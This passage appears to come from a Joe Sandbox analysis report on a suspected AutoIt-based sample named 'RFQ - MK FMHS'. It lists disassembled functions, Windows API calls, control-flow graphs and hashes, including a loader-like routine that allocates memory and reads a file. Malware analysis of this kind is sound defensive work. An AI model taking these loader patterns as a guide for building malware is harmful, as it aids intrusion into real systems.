                    • Instruction Fuzzy Hash: 2BC13AB1A00219AEDF21DFA5CC85ADEB7BDEF44304F0050ABF609F6252DB709A458F65
                    Function 00E7301E Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 68windowregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00E73074
                    • RegisterClassExW.USER32(00000030), ref: 00E7309E
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E730AF
                    • InitCommonControlsEx.COMCTL32(?), ref: 00E730CC
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E730DC
                    • LoadIconW.USER32(000000A9), ref: 00E730F2
                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E73101
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 2914291525-1005189915
                    • Opcode ID: 6944b1e84e88360a527ec5a76e1f3d526333f489d818cae2302e287ab6a323f8
                    • Instruction ID: 7fb288f5673b7d38bdd978c0be6f1779cb9e3cc7cf13fd13588e0ba9ffee0366
                    • Opcode Fuzzy Hash: 6944b1e84e88360a527ec5a76e1f3d526333f489d818cae2302e287ab6a323f8
                    • Instruction Fuzzy Hash: F93137B1940309AFDB00DFA5EC85AEDBBF1FF09320F10852AE640E62A0D7B54585DF91
                    Function 00E73041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00E73074
                    • RegisterClassExW.USER32(00000030), ref: 00E7309E
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E730AF
                    • InitCommonControlsEx.COMCTL32(?), ref: 00E730CC
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E730DC
                    • LoadIconW.USER32(000000A9), ref: 00E730F2
                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E73101
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 2914291525-1005189915
                    • Opcode ID: 8b11b46f2f132bd301ac84ef4a9d813926c39211f5d8838a3f365ab1d3db7aa3
                    • Instruction ID: 6109bfe1cc94c647332b866e1c08e0925d62037d2020fa2316996587a689331f
                    • Opcode Fuzzy Hash: 8b11b46f2f132bd301ac84ef4a9d813926c39211f5d8838a3f365ab1d3db7aa3
                    • Instruction Fuzzy Hash: 3221B4B1910218BFDB00DFA5E889AADBBF5FF08710F00812AFA10E62A0D7B14548DF95
                    Function 00E771EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00E74864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00F362F8,?,00E737C0,?), ref: 00E74882
                      • Part of subcall function 00E9074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00E772C5), ref: 00E90771
                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E77308
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00EAECF1
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00EAED32
                    • RegCloseKey.ADVAPI32(?), ref: 00EAED70
                    • _wcscat.LIBCMT ref: 00EAEDC9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                    • API String ID: 2673923337-2727554177
                    • Opcode ID: 8986ded79af6b0e48b2783649a6dfb2b16e37ea5d4ae828649b7cbb1e54ea6a9
                    • Instruction ID: 116d14316f78556d88a5766d42b493d2722d3f3a4c7fae5a203dfb13135aa68f
                    • Opcode Fuzzy Hash: 8986ded79af6b0e48b2783649a6dfb2b16e37ea5d4ae828649b7cbb1e54ea6a9
                    • Instruction Fuzzy Hash: 48718FB15083059EC724EF65DC818ABB7E9FF89360F40552EF449A72A0DB70D948EF62
                    Function 00E73A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00E73A62
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00E73A71
                    • LoadIconW.USER32(00000063), ref: 00E73A88
                    • LoadIconW.USER32(000000A4), ref: 00E73A9A
                    • LoadIconW.USER32(000000A2), ref: 00E73AAC
                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E73AD2
                    • RegisterClassExW.USER32(?), ref: 00E73B28
                      • Part of subcall function 00E73041: GetSysColorBrush.USER32(0000000F), ref: 00E73074
                      • Part of subcall function 00E73041: RegisterClassExW.USER32(00000030), ref: 00E7309E
                      • Part of subcall function 00E73041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E730AF
                      • Part of subcall function 00E73041: InitCommonControlsEx.COMCTL32(?), ref: 00E730CC
                      • Part of subcall function 00E73041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E730DC
                      • Part of subcall function 00E73041: LoadIconW.USER32(000000A9), ref: 00E730F2
                      • Part of subcall function 00E73041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E73101
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                    • String ID: #$0$AutoIt v3
                    • API String ID: 423443420-4155596026
                    • Opcode ID: 4beebcdb7951195551895d3add8bd6e6dfd7237f09ba701e1fb762bc3ab10e41
                    • Instruction ID: 32cb0f9fde377914cb5b5f0c7fb0957c59ff6a57db8f4dde2488bd609477a990
                    • Opcode Fuzzy Hash: 4beebcdb7951195551895d3add8bd6e6dfd7237f09ba701e1fb762bc3ab10e41
                    • Instruction Fuzzy Hash: AB215C70910308BFEF109FA5EC09B9E7BB6EB48720F00812AE504B62A1C3B69554EF94
                    Function 00E73633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 767 e73633-e73681 769 e73683-e73686 767->769 770 e736e1-e736e3 767->770 772 e736e7 769->772 773 e73688-e7368f 769->773 770->769 771 e736e5 770->771 774 e736ca-e736d2 DefWindowProcW 771->774 775 ead31c-ead34a call e811d0 call e811f3 772->775 776 e736ed-e736f0 772->776 777 e73695-e7369a 773->777 778 e7375d-e73765 PostQuitMessage 773->778 782 e736d8-e736de 774->782 811 ead34f-ead356 775->811 784 e73715-e7373c SetTimer RegisterWindowMessageW 776->784 785 e736f2-e736f3 776->785 779 ead38f-ead3a3 call ed2a16 777->779 780 e736a0-e736a2 777->780 783 e73711-e73713 778->783 779->783 803 ead3a9 779->803 786 e73767-e73776 call e74531 780->786 787 e736a8-e736ad 780->787 783->782 784->783 788 e7373e-e73749 CreatePopupMenu 784->788 791 ead2bf-ead2c2 785->791 792 e736f9-e7370c KillTimer call e744cb call e73114 785->792 786->783 793 e736b3-e736b8 787->793 794 ead374-ead37b 787->794 788->783 798 ead2f8-ead317 MoveWindow 791->798 799 ead2c4-ead2c6 791->799 792->783 801 e736be-e736c4 793->801 802 e7374b-e7375b call e745df 793->802 794->774 809 ead381-ead38a call ec817e 794->809 798->783 806 ead2c8-ead2cb 799->806 807 ead2e7-ead2f3 SetFocus 799->807 801->774 801->811 802->783 803->774 806->801 812 ead2d1-ead2e2 call e811d0 806->812 807->783 809->774 811->774 817 ead35c-ead36f call e744cb call e743db 811->817 812->783 817->774
                    APIs
                    • DefWindowProcW.USER32(?,?,?,?), ref: 00E736D2
                    • KillTimer.USER32(?,00000001), ref: 00E736FC
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E7371F
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E7372A
                    • CreatePopupMenu.USER32 ref: 00E7373E
                    • PostQuitMessage.USER32(00000000), ref: 00E7375F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                    • String ID: TaskbarCreated
                    • API String ID: 129472671-2362178303
                    • Opcode ID: d2fcac6d9283b3396f06714610a79fbf2956abe3f07a9e38859d863f7ad73057
                    • Instruction ID: 1e59d15232e9185409722a91b5207d92acfb8259b748f56f7823da11592a0152
                    • Opcode Fuzzy Hash: d2fcac6d9283b3396f06714610a79fbf2956abe3f07a9e38859d863f7ad73057
                    • Instruction Fuzzy Hash: 814127B1204109BBDF54AB74DC49BBA3795EB45310F14A12AF50AF62E2DB60EE04F761
                    Function 00E73778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                    Download Yara Rule

                    Control-flow Graph

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                    • API String ID: 1825951767-3513169116
                    • Opcode ID: 84fe5a9fd7cba73af8cd82478cc9083dc9d59bd36e4bbc2ebaf094d4eb4ccc7f
                    • Instruction ID: d8331f037464fc50ff4c39766894792de1b1a5f54f7e64b4c0c5b08d9dbd41dc
                    • Opcode Fuzzy Hash: 84fe5a9fd7cba73af8cd82478cc9083dc9d59bd36e4bbc2ebaf094d4eb4ccc7f
                    • Instruction Fuzzy Hash: 05A1527191021DAADF04EBA0CC95DEEB7B8FF14310F44942AF41AB7192DF749A09DB61
                    Function 00E525D0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 952 e525d0-e5267e call e50000 955 e52685-e526ab call e534e0 CreateFileW 952->955 958 e526b2-e526c2 955->958 959 e526ad 955->959 966 e526c4 958->966 967 e526c9-e526e3 VirtualAlloc 958->967 960 e527fd-e52801 959->960 962 e52843-e52846 960->962 963 e52803-e52807 960->963 968 e52849-e52850 962->968 964 e52813-e52817 963->964 965 e52809-e5280c 963->965 969 e52827-e5282b 964->969 970 e52819-e52823 964->970 965->964 966->960 971 e526e5 967->971 972 e526ea-e52701 ReadFile 967->972 973 e528a5-e528ba 968->973 974 e52852-e5285d 968->974 977 e5282d-e52837 969->977 978 e5283b 969->978 970->969 971->960 979 e52703 972->979 980 e52708-e52748 VirtualAlloc 972->980 975 e528bc-e528c7 VirtualFree 973->975 976 e528ca-e528d2 973->976 981 e52861-e5286d 974->981 982 e5285f 974->982 975->976 977->978 978->962 979->960 983 e5274f-e5276a call e53730 980->983 984 e5274a 980->984 985 e52881-e5288d 981->985 986 e5286f-e5287f 981->986 982->973 992 e52775-e5277f 983->992 984->960 988 e5288f-e52898 985->988 989 e5289a-e528a0 985->989 987 e528a3 986->987 987->968 988->987 989->987 993 e52781-e527b0 call e53730 992->993 994 e527b2-e527c6 call e53540 992->994 993->992 1000 e527c8 994->1000 1001 e527ca-e527ce 994->1001 1000->960 1002 e527d0-e527d4 FindCloseChangeNotification 1001->1002 1003 e527da-e527de 1001->1003 1002->1003 1004 e527e0-e527eb VirtualFree 1003->1004 1005 e527ee-e527f7 1003->1005 1004->1005 1005->955 1005->960
                    APIs
                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00E526A1
                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E528C7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639798335.0000000000E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e50000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CreateFileFreeVirtual
                    • String ID:
                    • API String ID: 204039940-0
                    • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                    • Instruction ID: c3ad46b1307af32a46efc40145b756b94ef924837c0e66e3d59c27791821d177
                    • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                    • Instruction Fuzzy Hash: 11A11874E00209EBDB14CFE4C894BEEB7B5BF49305F209559EA01BB280D7759A84DB94
                    Function 00E739E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1073 e739e7-e73a57 CreateWindowExW * 2 ShowWindow * 2
                    APIs
                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E73A15
                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E73A36
                    • ShowWindow.USER32(00000000,?,?), ref: 00E73A4A
                    • ShowWindow.USER32(00000000,?,?), ref: 00E73A53
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Window$CreateShow
                    • String ID: AutoIt v3$edit
                    • API String ID: 1584632944-3779509399
                    • Opcode ID: 4f630cd48d9897f704df224e3f07943aa83cf1902737f0a8cb106d8d7cafc3ef
                    • Instruction ID: 21006b3a961fcc4ca37d08d8feaebfd1399732121fecdd7f09ee4e26f4fd87ef
                    • Opcode Fuzzy Hash: 4f630cd48d9897f704df224e3f07943aa83cf1902737f0a8cb106d8d7cafc3ef
                    • Instruction Fuzzy Hash: D5F030706002987EEF301717AC09E373E7EDBC7F60B01802AF900E21B0C5A55810EA70
                    Function 00E523B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 142fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1074 e523b0-e524d2 call e50000 call e522a0 CreateFileW 1081 e524d4 1074->1081 1082 e524d9-e524e9 1074->1082 1083 e52589-e5258e 1081->1083 1085 e524f0-e5250a VirtualAlloc 1082->1085 1086 e524eb 1082->1086 1087 e5250c 1085->1087 1088 e5250e-e52525 ReadFile 1085->1088 1086->1083 1087->1083 1089 e52527 1088->1089 1090 e52529-e52563 call e522e0 call e512a0 1088->1090 1089->1083 1095 e52565-e5257a call e52330 1090->1095 1096 e5257f-e52587 ExitProcess 1090->1096 1095->1096 1096->1083
                    APIs
                      • Part of subcall function 00E522A0: Sleep.KERNELBASE(000001F4), ref: 00E522B1
                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E524C8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639798335.0000000000E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e50000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CreateFileSleep
                    • String ID: A7S7CBWWSP34UEGV
                    • API String ID: 2694422964-130553867
                    • Opcode ID: a6c930ed2f2ad9f6444489d47c964ecf49e5c0dc43d9d26d2a60cba48db6afb1
                    • Instruction ID: eb0ab8261fa2c38e51be9e7517eafbd76323c99ece5413ba9a198a33b0aaa243
                    • Opcode Fuzzy Hash: a6c930ed2f2ad9f6444489d47c964ecf49e5c0dc43d9d26d2a60cba48db6afb1
                    • Instruction Fuzzy Hash: 3A51C530D04249EBEF11DBE4C854BEEBB79AF05305F004599E608BB2C0D7B91B48CBA6
                    Function 00E7410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1098 e7410d-e74123 1099 e74200-e74204 1098->1099 1100 e74129-e7413e call e77b76 1098->1100 1103 e74144-e74164 call e77d2c 1100->1103 1104 ead5dd-ead5ec LoadStringW 1100->1104 1107 ead5f7-ead60f call e77c8e call e77143 1103->1107 1108 e7416a-e7416e 1103->1108 1104->1107 1117 e7417e-e741fb call e93020 call e7463e call e92ffc Shell_NotifyIconW call e75a64 1107->1117 1120 ead615-ead633 call e77e0b call e77143 call e77e0b 1107->1120 1110 e74205-e7420e call e781a7 1108->1110 1111 e74174-e74179 call e77c8e 1108->1111 1110->1117 1111->1117 1117->1099 1120->1117
                    APIs
                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00EAD5EC
                      • Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66
                    • _memset.LIBCMT ref: 00E7418D
                    • _wcscpy.LIBCMT ref: 00E741E1
                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E741F1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                    • String ID: Line:
                    • API String ID: 3942752672-1585850449
                    • Opcode ID: 5be5eb81feb8c39d39a80caf9be4a6e8b09accc4e0f1a8276af3dd97eecb0bd7
                    • Instruction ID: a209671f517f8739eca9c109f65f010f0a7bf23ac379cb33444d633033ac2354
                    • Opcode Fuzzy Hash: 5be5eb81feb8c39d39a80caf9be4a6e8b09accc4e0f1a8276af3dd97eecb0bd7
                    • Instruction Fuzzy Hash: 6231D171409304AADB22EB60EC46BDB77E8AF49314F10D51EF1D9B20E1EB74A648C793
                    Function 00E9564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1133 e9564d-e95666 1134 e95668-e9566d 1133->1134 1135 e95683 1133->1135 1134->1135 1136 e9566f-e95671 1134->1136 1137 e95685-e9568b 1135->1137 1138 e9568c-e95691 1136->1138 1139 e95673-e95678 call e98d68 1136->1139 1141 e9569f-e956a3 1138->1141 1142 e95693-e9569d 1138->1142 1150 e9567e call e98ff6 1139->1150 1145 e956b3-e956b5 1141->1145 1146 e956a5-e956b0 call e93020 1141->1146 1142->1141 1144 e956c3-e956d2 1142->1144 1148 e956d9 1144->1148 1149 e956d4-e956d7 1144->1149 1145->1139 1147 e956b7-e956c1 1145->1147 1146->1145 1147->1139 1147->1144 1152 e956de-e956e3 1148->1152 1149->1152 1150->1135 1155 e956e9-e956f0 1152->1155 1156 e957cc-e957cf 1152->1156 1157 e95731-e95733 1155->1157 1158 e956f2-e956fa 1155->1158 1156->1137 1160 e9579d-e9579e call ea0df7 1157->1160 1161 e95735-e95737 1157->1161 1158->1157 1159 e956fc 1158->1159 1165 e957fa 1159->1165 1166 e95702-e95704 1159->1166 1167 e957a3-e957a7 1160->1167 1163 e95739-e95741 1161->1163 1164 e9575b-e95766 1161->1164 1168 e95751-e95755 1163->1168 1169 e95743-e9574f 1163->1169 1170 e95768 1164->1170 1171 e9576a-e9576d 1164->1171 1174 e957fe-e95807 1165->1174 1172 e9570b-e95710 1166->1172 1173 e95706-e95708 1166->1173 1167->1174 1175 e957a9-e957ae 1167->1175 1176 e95757-e95759 1168->1176 1169->1176 1170->1171 1177 e9576f-e9577b call e94916 call ea10ab 1171->1177 1178 e957d4-e957d8 1171->1178 1172->1178 1179 e95716-e9572f call ea0f18 1172->1179 1173->1172 1174->1137 1175->1178 1180 e957b0-e957c1 1175->1180 1176->1171 1194 e95780-e95785 1177->1194 1181 e957ea-e957f5 call e98d68 1178->1181 1182 e957da-e957e7 call e93020 1178->1182 1193 e95792-e9579b 1179->1193 1185 e957c4-e957c6 1180->1185 1181->1150 1182->1181 1185->1155 1185->1156 1193->1185 1195 e9578b-e9578e 1194->1195 1196 e9580c-e95810 1194->1196 1195->1165 1197 e95790 1195->1197 1196->1174 1197->1193
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                    • String ID:
                    • API String ID: 1559183368-0
                    • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                    • Instruction ID: f1b9c21b29e748ae59e0631ed1cb12cbfcc18e049ad432ebebe53aa9933e7566
                    • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                    • Instruction Fuzzy Hash: EA51B332A00B05DBDF268FB9C8846AE77B5AF41324F64972EF825B62D1D7709E518B40
                    Function 00E769CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E74F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00F362F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E74F6F
                    • _free.LIBCMT ref: 00EAE68C
                    • _free.LIBCMT ref: 00EAE6D3
                      • Part of subcall function 00E76BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E76D0D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _free$CurrentDirectoryLibraryLoad
                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                    • API String ID: 2861923089-1757145024
                    • Opcode ID: 0ea99c12abc10b401340319273f148cb9b84611518892e2a2c599459bcf8bf86
                    • Instruction ID: 65e2691ba1eb1b637827e73e4da613e5de256d268d6d78f8e86b531030bf98b4
